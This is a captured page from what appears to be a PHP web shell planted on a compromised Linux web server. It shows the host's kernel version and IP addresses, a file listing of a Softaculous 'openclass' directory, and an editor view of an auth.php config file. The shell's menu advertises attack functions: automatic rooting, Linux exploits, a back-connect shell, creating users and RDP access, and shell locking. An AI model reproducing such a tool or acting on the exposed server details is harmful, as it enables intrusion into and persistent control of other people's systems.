Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
openclass /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
.htaccess
8.19
KB
-rw-r--r--
auth.php
374
B
-rw-r--r--
clone.php
7.06
KB
-rw-r--r--
database.php
618
B
-rw-r--r--
edit.php
5.73
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
fileindex.php
248
B
-rw-r--r--
import.php
4.65
KB
-rw-r--r--
info.xml
2.19
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
9.2
KB
-rw-r--r--
install.xml
2.62
KB
-rw-r--r--
md5
4.9
KB
-rw-r--r--
notes.txt
1.25
KB
-rw-r--r--
robots.txt
81
B
-rw-r--r--
sitemap.xml
3.63
KB
-rw-r--r--
upgrade.php
9.9
KB
-rw-r--r--
upgrade.xml
822
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : auth.php
<?php defined('SYSPATH') or die('No direct access allowed.'); return array( 'driver' => 'oc', 'hash_method' => 'sha256', 'hash_key' => '[[hash_key]]', 'lifetime' => 90*24*60*60, 'session_type' => Session::$default, 'session_key' => 'auth_user', 'cookie_salt' => 'cookie_[[hash_key]]', 'ql_lifetime' => 7*24*60*60, 'ql_separator' => '|', );
Close